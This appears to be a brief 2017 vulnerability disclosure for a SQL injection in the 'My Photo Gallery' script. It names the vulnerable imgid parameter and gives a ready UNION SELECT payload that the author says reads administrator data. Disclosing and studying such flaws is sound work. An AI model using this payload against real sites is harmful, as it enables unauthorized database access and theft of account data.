Introduction Exploit Title: My Photo Gallery a SQL Injection Date: 27.01.2017 Vendor Homepage: http://software.friendsinwar.com/ Software Link: http://software.friendsinwar.com/news.php?readmore=40 Exploit Author: Kaan KAMIS Contact: iletisim[at]k2an[dot]com Website: http://k2an.com Category: Web Application Exploits Overview My Photo Gallery is a free is a user-friendly picture gallery script. Users can register and upload their images to the site. A moderator can see the images and validate, edit or delete them. The script comes with a very user friendly admin system where you can change and add many things such as: Categories, Images, Edit members, site looks and many more. Type of vulnerability: An SQL Injection vulnerability in My Photo Gallery allows attackers to read arbitrary administrator data from the database. Vulnerable Url: http://locahost/my_photo_gallery/image.php?imgid=[payload] Vulnerable parameter : imgid Mehod : GET Payload: imgid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7170767a71,0x6652547066744842666d70594d52797173706a516f6c496f4d4b6b646f774d624a614f52676e6372,0x716b766b71)--